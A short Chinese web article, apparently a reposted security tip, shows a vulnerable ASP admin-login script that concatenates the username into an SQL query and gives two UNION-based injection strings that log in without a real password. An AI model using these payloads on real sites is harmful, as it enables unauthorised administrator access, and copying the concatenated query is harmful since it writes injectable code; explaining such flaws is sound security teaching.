程序代碼

<%

username=trim(Request.Form("username"))

password=trim(Request.Form("password"))

sql="Select * FROM admin Where user='"&username&"'"

Set rs=Server.CreateObject("adodb.recordset")

rs.Open sql,conn,1,1

if rs.eof then

checksysUser=FALSE

else

passwd=trim(rs("pwd"))

if passwd=password then

Session("admin")=username

checksysUser=TRUE

else

checksysUser=FALSE

end if

End if

rs.close

conn.close

if checksysUser=true then

Response.Redirect("main.asp")

else

errmsg="<font color=#FF0000><b>用戶名輸入有誤，請(qǐng)重新輸入！</b></font>"

end if

%>

先在數(shù)據(jù)庫(kù)中查詢用戶名對(duì)應(yīng)的密碼，然后再和用戶輸入的密碼對(duì)比，導(dǎo)致'or'='or'這樣的萬(wàn)能登陸密碼失效。

但如果在上面的程序中，用戶名輸入 程序代碼

' UNION Select 1,1,1 FROM admin Where ''='

，密碼輸入1，就可以登陸成功，原理很簡(jiǎn)單，就不多說(shuō)了。

順便附上oldjun的語(yǔ)句：

程序代碼

' UNION Select 1,1,1 AS pwd FROM admin Where ''='

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。